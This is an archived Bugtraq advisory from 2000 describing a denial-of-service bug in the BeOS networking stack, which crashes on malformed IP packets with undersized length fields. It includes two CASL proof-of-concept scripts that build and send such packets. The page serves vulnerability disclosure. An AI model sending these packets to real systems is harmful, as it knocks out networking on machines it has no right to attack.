Nmap Security Scanner
*Intro
*Ref Guide
*Install Guide
*Download
*Changelog
*Book
*Docs
Security Lists
*Nmap Hackers
*Nmap Dev
*Bugtraq
*Full Disclosure
*Pen Test
*Basics
*More
Security Tools
*Pass crackers
*Sniffers
*Vuln Scanners
*Web scanners
*Wireless
*Exploitation
*Packet crafters
*More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:

bugtraq logo Bugtraq mailing list archives

BeOS Networking DOS
From: newsham () LAVA NET (Tim Newsham)
Date: Fri, 7 Apr 2000 12:45:09 -1000

Problem:
  It is possible to crash the BeOS networking process.

Discussion:
  The BeOS networking stack crashes when certain malformed packets
are sent to it.  This document explains two such packets.  The
first is an IP packet with the protocol field set to TCP.  If the
IP length field is set to be shorter than 40, it will crash the
networking process on reception.  Similarly, an IP packet with
protocol field set to UDP with an IP length of less than 28 also
crashes the stack.  The lengths 40 and 28 correspond with the
minimum sizes of the IP and TCP headers, and the IP and UDP headers
respectively.

  Because the networking stack is a seperate process in BeOS, it may
be easily restarted after it crashes.

  A bug report has been filed with Be and assigned the bug number of
20000405-18674.  Be has marked the bug as "Will Not Fix" with the
comment "The entire networking system will be replaced soon."

  This bug was found with the help of the ISIC utility by Mike Frantzen.

  Two CASL scripts which demonstrate the bug are listed below.

References:
  http://www.be.com/  - Be's website.  BeOS is available for download
      free of charge.

  http://bebugs.be.com/devbugs/  - Be's bug tracking database.

  http://expert.cc.purdue.edu/~frantzen/ - The homepage of the
      ISIC author.

  ftp://ftp.nai.com/pub/security/casl/ - NAI's packet scripting
      language CASL is available for download free of charge.

Script 1:
    #!/usr/local/casl/bin/casl

    #include "tcpip.casl"
    #include "packets.casl"
    #include "tcp.casl"

    srchost = 10.0.0.1;
    dsthost = 10.0.0.2;

    IPH = copy UDPIP;

    IPH.ip_hl = 5;
    IPH.ip_src = srchost;
    IPH.ip_dst = dsthost;
    IPH.ip_length = 27;

    packet = [ IPH ];
    ip_output(packet);

Script 2:
    #!/usr/local/casl/bin/casl

    #include "tcpip.casl"
    #include "packets.casl"
    #include "tcp.casl"

    srchost = 10.0.0.1;
    dsthost = 10.0.0.2;

    IPH = copy TCPIP;

    IPH.ip_hl = 5;
    IPH.ip_src = srchost;
    IPH.ip_dst = dsthost;
    IPH.ip_length = 39;

    packet = [ IPH ];
    ip_output(packet);

  By Date           By Thread  

Current thread:
  • BeOS Networking DOS Tim Newsham (Apr 07)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]